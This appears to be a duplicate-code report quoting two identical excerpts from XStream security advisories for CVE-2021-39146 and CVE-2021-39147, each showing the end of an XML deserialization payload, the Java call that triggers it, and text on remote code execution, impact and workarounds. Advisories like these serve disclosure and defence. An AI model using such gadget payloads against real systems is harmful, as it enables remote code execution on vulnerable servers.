xstream-distribution/src/content/CVE-2021-39146.html [91:114]: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>test</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> </sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.

Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.

Impact

The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.

Workarounds

See workarounds for the different versions covering all CVEs.

Credits

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - xstream-distribution/src/content/CVE-2021-39147.html [216:239]: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>test</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> </sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.

Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.

Impact

The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.

Workarounds

See workarounds for the different versions covering all CVEs.

Credits

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -